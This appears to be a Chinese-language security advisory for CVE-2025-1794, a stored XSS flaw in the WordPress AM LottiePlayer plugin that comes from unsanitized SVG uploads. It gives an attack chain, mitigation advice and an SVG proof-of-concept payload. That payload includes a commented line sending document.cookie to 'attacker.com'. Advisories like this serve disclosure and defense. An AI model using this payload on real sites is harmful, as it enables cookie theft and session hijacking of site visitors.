CVE-2025-1794 CVSS 5.4 中危

CVE-2025-1794 WordPress AM LottiePlayer存储型XSS漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-1794

漏洞类型

存储型跨站脚本

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress AM LottiePlayer 插件

漏洞概述

WordPress AM LottiePlayer插件在3.6.0及以下版本中存在存储型跨站脚本（XSS）漏洞。该漏洞源于对上传的SVG文件缺乏足够的输入清理和输出转义。攻击者利用该漏洞可在页面中注入恶意脚本，当用户访问被注入的页面时，脚本将被执行，从而导致数据泄露或会话劫持等风险。

技术细节

该漏洞的核心在于AM LottiePlayer插件在处理用户上传的SVG（可缩放矢量图形）文件时，未对文件内容进行严格的输入清洗和输出转义。SVG文件本质上是一种基于XML的文本格式，允许嵌入JavaScript代码。攻击者只需拥有WordPress的作者级别（Author-level）及以上权限，即可登录后台，利用插件的上传功能，构造包含恶意JavaScript代码的特制SVG文件并上传。由于插件缺乏有效的安全过滤机制，该恶意文件会被保存在服务器上。当管理员或其他用户访问包含该SVG文件的页面时，浏览器会解析SVG中的恶意脚本并自动执行。这是一种典型的存储型XSS攻击，攻击者无需针对每个受害者进行单独诱导，利用持久化的恶意脚本窃取敏感信息（如Session Cookie）、执行未授权操作或重定向用户至钓鱼网站。

攻击链分析

STEP 1

1. 获取权限

攻击者注册或获取一个具有Author（作者）级别及以上权限的WordPress账户。

STEP 2

2. 构造Payload

攻击者创建一个包含恶意JavaScript代码的SVG文件，利用SVG支持XML脚本执行特性。

STEP 3

3. 上传文件

攻击者登录后台，通过AM LottiePlayer插件的上传功能上传恶意的SVG文件。

STEP 4

4. 持久化存储

由于插件缺乏输入清理，恶意SVG文件被成功保存在服务器上，并可能嵌入到文章或页面中。

STEP 5

5. 触发漏洞

当受害者（如管理员）访问包含该SVG文件的页面时，浏览器解析SVG并执行其中的恶意脚本。

STEP 6

6. 执行攻击

恶意脚本在受害者浏览器中运行，可能导致Cookie窃取、会话劫持或恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Malicious SVG PoC for CVE-2025-1794 -->
<!-- Save as exploit.svg and upload via plugin -->
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="15" fill="red">XSS Test</text>
  <script>
    // Execution of arbitrary JavaScript
    alert('CVE-2025-1794 Exploited');
    
    // Example: Exfiltrate cookies
    // fetch('https://attacker.com/steal?c=' + document.cookie);
  </script>
</svg>

影响范围

AM LottiePlayer <= 3.6.0

防御指南

临时缓解措施

在未升级插件之前，建议暂时禁用该插件的上传功能或直接停用插件。管理员应审查现有媒体库中的SVG文件，删除可疑文件，并加强对低权限用户的管理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表